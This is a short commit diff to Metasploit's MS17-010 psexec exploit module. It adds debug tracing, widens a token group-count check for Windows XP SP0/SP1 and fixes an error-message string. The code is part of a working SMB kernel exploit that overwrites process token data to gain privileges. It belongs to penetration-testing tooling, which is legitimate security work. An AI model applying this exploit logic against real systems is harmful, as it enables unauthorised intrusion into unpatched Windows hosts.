more trace and more flexible tolerance for SP0/SP1

Author: zerosum0x0

lib/msf/core/exploit/smb/client/psexec_ms17_010.rb

@@ -122,21 +122,29 @@ def modify_token()
       @ctx['tokenData'] = tokenData
       @ctx['tokenAddr'] = tokenAddr
 
+      if datastore['DBGTRACE']
+        print_status("TOKEN data = #{bin_to_hex(tokenData)}")
+      end
+
       userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0] #unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
       userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0] #unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
 
       if @ctx['os'] == 'WINXP' and @ctx['arch'] == 'x86'
-        if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
+        if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
           print_error("Bad TOKEN offsets detected (group count = #{userAndGroupCount}), performing workaround...")
           @ctx['TOKEN_USER_GROUP_CNT_OFFSET'] = @ctx['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
           @ctx['TOKEN_USER_GROUP_ADDR_OFFSET'] = @ctx['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1']
 
           userAndGroupCount = tokenData[@ctx['TOKEN_USER_GROUP_CNT_OFFSET']..-1].unpack("V")[0]
           userAndGroupsAddr = tokenData[@ctx['TOKEN_USER_GROUP_ADDR_OFFSET']..-1].unpack(fmt)[0]
 
+          if datastore['DBGTRACE']
+            print_status("New TOKEN offsets (group count = #{userAndGroupCount})")
+          end
+
           # hopefully its not bad anymore
-          if userAndGroupCount > 4 or userAndGroupCount == 0 # check NULL too
-            raise MS17_010_Error, 'Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD'
+          if userAndGroupCount > 10 or userAndGroupCount == 0 # check NULL too
+            raise MS17_010_Error, "Bad TOKEN offsets after workround (group count = #{userAndGroupCount})... Abort > BSOD"
           end
         end
       end